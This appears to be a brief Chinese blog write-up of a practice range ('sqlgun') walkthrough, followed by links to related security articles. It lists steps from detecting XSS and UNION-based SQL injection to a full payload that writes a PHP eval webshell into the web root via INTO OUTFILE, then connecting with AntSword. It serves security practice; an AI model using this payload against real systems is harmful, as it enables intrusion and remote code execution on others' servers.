sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
谈不譚网安13 小时前
Raven2
web安全·网络安全
网安INF18 小时前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
white-persist19 小时前
SQL 注入详解:从原理到实战
前端·网络·数据库·sql·安全·web安全·原型模式
嗨丶王哪跑21 小时前
网络安全审计技术原理与应用
运维·网络·安全·web安全
Mr_Meng_De1 天前
AI环境下的网络安全人才的发展方向
安全·web安全
啥都不懂的小小白1 天前
密码学入门:从古典加密到现代网络安全
安全·web安全·密码学
YoungLime2 天前
DVWA靶场之十六:未验证的重定向漏洞(Open HTTP Redirect)
网络·安全·web安全
YoungLime3 天前
DVWA靶场之十:DOM 型 XSS(DOM Based Cross Site Scripting (XSS))
网络·安全·web安全
mooyuan天天3 天前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)
web安全·信息泄露·ctfhub·svn泄露·源码泄露·dvcs ripper
YoungLime3 天前
DVWA靶场之十三:CSP 绕过(Content Security Policy (CSP) Bypass)
网络·安全·web安全